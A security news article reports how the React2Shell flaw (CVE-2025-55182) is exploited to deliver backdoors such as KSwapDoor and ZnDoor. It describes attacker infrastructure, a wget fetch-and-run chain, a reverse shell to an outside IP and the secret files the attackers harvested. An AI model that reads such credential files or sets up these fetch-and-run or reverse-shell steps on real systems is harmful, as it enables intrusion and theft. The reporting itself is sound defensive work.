The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security.
“KSwapDoor is a professionally engineered remote access tool designed with stealth in mind,” Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a statement.
“It builds an internal mesh network, allowing compromised servers to talk to each other and evade security blocks. It uses military-grade encryption to hide its communications and, most alarmingly, features a ‘sleeper’ mode that lets attackers bypass firewalls by waking the malware up with a secret, invisible signal.”
The cybersecurity company noted that it was previously mistakenly classified as BPFDoor, adding that the Linux backdoor offers interactive shell, command execution, file operations and lateral movement scanning capabilities. It also impersonates a legitimate Linux kernel swap daemon to evade detection.
In a related development, NTT Security said organizations in Japan are being targeted by cyber attacks exploiting React2Shell to deploy ZnDoor, a malware that’s been assessed to be detected in the wild since December 2023. The attack chains involve running a bash command to fetch the payload from a remote server (45.76.155[.]14) using wget and executing it.
A remote access trojan, it contacts the same threat actor-controlled infrastructure to receive commands and execute them on the host. Some of the supported commands are listed below –
- shell, to execute a command
- interactive_shell, to launch an interactive shell
- explorer, to get a list of directories
- explorer_cat, to read and display a file
- explorer_delete, to delete a file
- explorer_upload, to download a file from the server
- explorer_download, to send files to the server
- system, to gather system information
- change_timefile, to change the timestamp of a file
- socket_quick_startstreams, to start a SOCKS5 proxy
- start_in_port_forward, to start port forwarding
- stop_in_port, to stop port forwarding
The disclosure comes as the vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), has been exploited by multiple threat actors, Google identifying at least five China-nexus groups that have weaponized to deliver an array of payloads –
- UNC6600 to deliver a tunneling utility named MINOCAT
- UNC6586 to deliver a downloader named SNOWLIGHT
- UNC6588 to deliver a backdoor named COMPOOD
- UNC6603 to deliver an updated version of a Go backdoor named HISONIC that uses Cloudflare Pages and GitLab to retrieve encrypted configuration and blend in with legitimate network activity
- UNC6595 to deliver a Linux version of ANGRYREBEL (aka Noodle RAT)
Microsoft, in its own advisory for CVE-2025-55182, said threat actors have taken advantage of the flaw to run arbitrary commands for post-exploitation, including setting up reverse shells to known Cobalt Strike servers, and then dropping remote monitoring and management (RMM) tools such as MeshAgent, modifying the authorized_keys file, and enabling root login.
Some of the payloads delivered in these attacks include VShell, EtherRAT, SNOWLIGHT, ShadowPad, and XMRig. The attacks are also characterized by the use of Cloudflare Tunnel endpoints (“*.trycloudflare.com”) to evade security defenses, as well as conducting reconnaissance of the compromised environments to facilitate lateral movement and credential theft.
The credential harvesting activity, the Windows maker said, targeted Azure Instance Metadata Service (IMDS) endpoints for Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud with the end goal of acquiring identity tokens to burrow deeper into cloud infrastructures.
“Attackers also deployed secret discovery tools such as TruffleHog and Gitleaks, along with custom scripts to extract several different secrets,” the Microsoft Defender Security Research Team said. “Attempts to harvest AI and cloud-native credentials, such as OpenAI API keys, Databricks tokens, and Kubernetes service‑account credentials, were also observed. Azure Command-Line Interface (CLI) (az) and Azure Developer CLI (azd) were also used to obtain tokens.”
In another campaign detailed by Beelzebub, threat actors have been observed exploiting flaws in Next.js, including CVE-2025-29927 and CVE-2025-66478 (the same React2Shell bug before it was rejected as a duplicate), to enable systematic extraction of credentials and sensitive data –
- .env, .env.local, .env.production, .env.development
- System environment variables (printenv, env)
- SSH keys (~/.ssh/id_rsa, ~/.ssh/id_ed25519, /root/.ssh/*)
- Cloud credentials (~/.aws/credentials, ~/.docker/config.json
- Git credentials (~/.git-credentials, ~/.gitconfig)
- Command history (last 100 commands from ~/.bash_history)
- System files (/etc/shadow, /etc/passwd)
The malware also proceeds to create persistence on the host to survive system reboots, install a SOCKS5 proxy, establish a reverse shell to “67.217.57[.]240:888,” and install a React scanner to probe the internet for further propagation.
The activity, codenamed Operation PCPcat, is estimated to have already breached 59,128 servers. “The campaign shows characteristics of large-scale intelligence operations and data exfiltration on an industrial scale,” the Italian company said.
The Shadowserver Foundation is currently tracking over 111,000 IP addresses vulnerable to React2Shell attacks, with over 77,800 instances in the U.S., followed by Germany (7,500), France (4,000), and India (2,300). Data from GreyNoise shows that there are 547 malicious IP addresses from the U.S., India, the U.K., Singapore, and the Netherlands partaking in the exploitation efforts over the past 24 hours.
